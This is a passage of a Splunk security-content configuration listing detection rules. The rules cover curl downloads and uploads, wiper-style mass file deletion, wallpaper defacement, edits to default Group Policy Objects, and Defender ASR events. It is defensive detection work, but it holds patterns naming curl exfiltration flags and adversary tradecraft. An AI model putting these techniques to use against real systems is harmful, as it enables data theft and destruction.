downloading a file to a suspicious location. \ -O or --output is used when a file is to be downloaded and placed in a specified location. \ During triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible Administrators or super users will use Curl for legitimate purposes. Filter as needed. action.escu.creation_date = 2021-10-19 action.escu.modification_date = 2021-10-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Curl Download to Suspicious Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Ingress Tool Transfer", "Forest Blizzard"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ to download a file to a suspicious directory. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Curl Download to Suspicious Path - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Ingress Tool Transfer", "Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \ -O or --output is used when a file is to be downloaded and placed in a specified location. \ During triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze. action.notable.param.rule_title = Windows Curl Download to Suspicious Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN ("*-O *","*--output*") Processes.process IN ("*\\appdata\\*","*\\programdata\\*","*\\public\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_download_to_suspicious_path_filter` [ESCU - Windows Curl Upload to Remote Destination - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \ `-T` or `--upload-file` is used when a file is to be uploaded to a remotge destination. \ `-d` or `--data` POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \ HTTP multipart formposts are done with `-F`, but this appears to not be compatible with the Windows version of Curl. Will update if identified adversary tradecraft. \ Adversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \ `-T` or `--upload-file` is used when a file is to be uploaded to a remotge destination. \ `-d` or `--data` POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \ HTTP multipart formposts are done with `-F`, but this appears to not be compatible with the Windows version of Curl. Will update if identified adversary tradecraft. \ Adversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be limited to source control applications and may be required to be filtered out. action.escu.creation_date = 2021-11-10 action.escu.modification_date = 2021-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Curl Upload to Remote Destination - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ uploading a file to a remote destination. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Curl Upload to Remote Destination - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of Windows Curl.exe uploading a file to a remote destination. \ `-T` or `--upload-file` is used when a file is to be uploaded to a remotge destination. \ `-d` or `--data` POST is the HTTP method that was invented to send data to a receiving web application, and it is, for example, how most common HTML forms on the web work. \ HTTP multipart formposts are done with `-F`, but this appears to not be compatible with the Windows version of Curl. Will update if identified adversary tradecraft. \ Adversaries may use one of the three methods based on the remote destination and what they are attempting to upload (zip vs txt). During triage, review parallel processes for further behavior. In addition, identify if the upload was successful in network logs. If a file was uploaded, isolate the endpoint and review. action.notable.param.rule_title = Windows Curl Upload to Remote Destination action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process IN ("*-T *","*--upload-file *", "*-d *", "*--data *", "*-F *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_curl_upload_to_remote_destination_filter` [ESCU - Windows Data Destruction Recursive Exec Files Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious process that is recursively deleting files on a compromised host. This behavior has been observed in several types of destructive malware, such as CaddyWiper, DoubleZero, and SwiftSlicer, which delete or overwrite files with randomly generated strings to make recovery impossible. Additionally, this analytic can detect potential recursive file writes across multiple files using Sysmon Event 23 or 26. Sysmon considers a file as deleted as soon as it is overwritten. This analytic serves as a strong indicator of potential destructive malware activity on a host machine or the uninstallation of a large software application. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a suspicious process that is recursively deleting files on a compromised host. This behavior has been observed in several types of destructive malware, such as CaddyWiper, DoubleZero, and SwiftSlicer, which delete or overwrite files with randomly generated strings to make recovery impossible. Additionally, this analytic can detect potential recursive file writes across multiple files using Sysmon Event 23 or 26. Sysmon considers a file as deleted as soon as it is overwritten. This analytic serves as a strong indicator of potential destructive malware activity on a host machine or the uninstallation of a large software application. action.escu.how_to_implement = To successfully implement this search, you need to ingest logs that include the process name, TargetFilename, and ProcessID executions from your endpoints. If you are using Sysmon, ensure you have at least version 2.0 of the Sysmon TA installed. action.escu.known_false_positives = The uninstallation of a large software application or the use of cleanmgr.exe may trigger this detection. A filter is necessary to reduce false positives. action.escu.creation_date = 2023-03-05 action.escu.modification_date = 2023-03-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Data Destruction Recursive Exec Files Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Swift Slicer", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = The process $process_name$ has removed a significant quantity of executable files, totaling [$count$], from the destination $dest$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "deleted_files", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Data Destruction Recursive Exec Files Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["Swift Slicer", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious process that is recursively deleting files on a compromised host. This behavior has been observed in several types of destructive malware, such as CaddyWiper, DoubleZero, and SwiftSlicer, which delete or overwrite files with randomly generated strings to make recovery impossible. Additionally, this analytic can detect potential recursive file writes across multiple files using Sysmon Event 23 or 26. Sysmon considers a file as deleted as soon as it is overwritten. This analytic serves as a strong indicator of potential destructive malware activity on a host machine or the uninstallation of a large software application. action.notable.param.rule_title = Windows Data Destruction Recursive Exec Files Deletion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode IN ("23","26") TargetFilename IN ("*.exe", "*.sys", "*.dll") | bin _time span=2m | stats count, values(TargetFilename) as deleted_files, min(_time) as firstTime, max(_time) as lastTime by user, dest, signature, signature_id, Image, process_name, process_guid | rename Image as process | where count >=500 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_data_destruction_recursive_exec_files_deletion_filter` [ESCU - Windows Defacement Modify Transcodedwallpaper File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a modification to the Transcodedwallpaper file in the wallpaper theme directory to change the wallpaper of the host machine. This technique was seen in adversaries attempting to deface or change the desktop wallpaper of the targeted host. During our testing, the common process that affects or changes the wallpaper if a user changes it via desktop personalized setting is explorer.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a modification to the Transcodedwallpaper file in the wallpaper theme directory to change the wallpaper of the host machine. This technique was seen in adversaries attempting to deface or change the desktop wallpaper of the targeted host. During our testing, the common process that affects or changes the wallpaper if a user changes it via desktop personalized setting is explorer.exe. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = 3rd part software application can change the wallpaper. Filter is needed. action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defacement Modify Transcodedwallpaper File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Brute Ratel C4"] action.risk = 1 action.risk.param._risk_message = modification or creation of transcodedwallpaper file by $process_name$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defacement Modify Transcodedwallpaper File - Rule action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_path !="*\\Windows\\Explorer.EXE" by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid Processes.original_file_name | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid | join proc_guid, _time [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.file_path = "*\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields file_name file_path process_name process_path process dest file_create_time _time proc_guid] | `windows_defacement_modify_transcodedwallpaper_file_filter` [ESCU - Windows Default Group Policy Object Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event ID 5136 to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event ID 5136 to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.how_to_implement = To successfully implement this search, the Advanced Security Audit policy setting `Audit Directory Service Changes` within `DS Access` needs to be enabled. Furthermore, the appropriate system access control lists (SACL) need to be created as the used events are not logged by default. A good guide to accomplish this can be found here https://jgspiers.com/audit-group-policy-changes/. action.escu.known_false_positives = The default Group Policy Objects within an AD network may be legitimately updated for administrative operations, filter as needed. action.escu.creation_date = 2023-03-28 action.escu.modification_date = 2023-03-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Default Group Policy Object Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A default group policy object was modified on $Computer$ by $SubjectUserSid$ action.risk.param._risk = [{"risk_object_field": "SubjectUserSid", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Default Group Policy Object Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Event ID 5136 to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.notable.param.rule_title = Windows Default Group Policy Object Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 ObjectClass=groupPolicyContainer AttributeLDAPDisplayName=versionNumber (ObjectDN="CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM,DC=*" OR ObjectDN="CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=POLICIES,CN=SYSTEM,DC=*") | stats min(_time) as firstTime max(_time) as lastTime by ObjectDN SubjectUserSid AttributeValue Computer DSName | rename AttributeValue as versionNumber | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_default_group_policy_object_modified_filter` [ESCU - Windows Default Group Policy Object Modified with GPME - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages the Endpoint datamodel to identify the potential edition of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the edition of the default GPOs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic leverages the Endpoint datamodel to identify the potential edition of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the edition of the default GPOs. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = The default Group Policy Objects within an AD network may be legitimately updated for administrative operations, filter as needed. action.escu.creation_date = 2023-04-24 action.escu.modification_date = 2023-04-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Default Group Policy Object Modified with GPME - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A default group policy object was opened with Group Policy Manage Editor on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Default Group Policy Object Modified with GPME - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages the Endpoint datamodel to identify the potential edition of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the edition of the default GPOs. action.notable.param.rule_title = Windows Default Group Policy Object Modified with GPME action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mmc.exe (Processes.process =*gpme.msc*) AND (Processes.process = "*31B2F340-016D-11D2-945F-00C04FB984F9*" OR Processes.process = "*6AC1786C-016F-11D2-945F-00C04fB984F9*" ) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_default_group_policy_object_modified_with_gpme_filter` [ESCU - Windows Defender ASR Audit Events - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection searches for Windows Defender ASR audit events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR audit events that are generated when a process or application attempts to perform an action that would be blocked by an ASR rule, but is allowed to proceed for auditing purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection searches for Windows Defender ASR audit events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR audit events that are generated when a process or application attempts to perform an action that would be blocked by an ASR rule, but is allowed to proceed for auditing purposes. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, setup a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. Note that Audit and block Event IDs have different fields, therefore the analytic will need to be modified for each type of event. action.escu.known_false_positives = False positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. For example, Event ID 1122 is generated when a process attempts to load a DLL that is blocked by an ASR rule. This can be triggered by legitimate applications that attempt to load DLLs that are not blocked by ASR rules. This is audit only. action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Audit Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] action.risk = 1 action.risk.param._risk_message = ASR audit event, $ASR_Rule$, was triggered on $dest$. action.risk.param._risk = [{"risk_object_field": "ASR_Rule", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Audit Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (1122, 1125, 1126, 1132, 1134) | lookup asr_rules ID OUTPUT ASR_Rule | fillnull value=NULL | stats count min(_time) as firstTime max(_time) as lastTime by host, Process_Name, Target_Commandline, Path, ID, EventCode, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_audit_events_filter` [ESCU - Windows Defender ASR Block Events - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection searches for Windows Defender ASR block events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR block events that are generated when a process or application attempts to perform an action that is blocked by an ASR rule. Typically, these will be enabled in block most after auditing and tuning the ASR rules themselves. Set to TTP once tuned. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection searches for Windows Defender ASR block events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR block events that are generated when a process or application attempts to perform an action that is blocked by an ASR rule. Typically, these will be enabled in block most after auditing and tuning the ASR rules themselves. Set to TTP once tuned. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, setup a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. Note that Audit and block Event IDs have different fields, therefore the analytic will need to be modified for each type of event. action.escu.known_false_positives = False positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. For example, Event ID 1122 is generated when a process attempts to load a DLL that is blocked by an ASR rule. This can be triggered by legitimate applications that attempt to load DLLs that are not blocked by ASR rules. This is block only. action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Block Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] action.risk = 1 action.risk.param._risk_message = ASR block event, $ASR_Rule$, was triggered on $dest$. action.risk.param._risk = [{"risk_object_field": "ASR_Rule", "risk_object_type": "other", "risk_score": 45}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Block Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (1121, 1126, 1129, 1131, 1133) | lookup asr_rules ID OUTPUT ASR_Rule | fillnull value=NULL | stats count min(_time) as firstTime max(_time) as lastTime by host, Path, Parent_Commandline, Process_Name, ID, EventCode, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_block_events_filter` [ESCU - Windows Defender ASR Registry Modification - 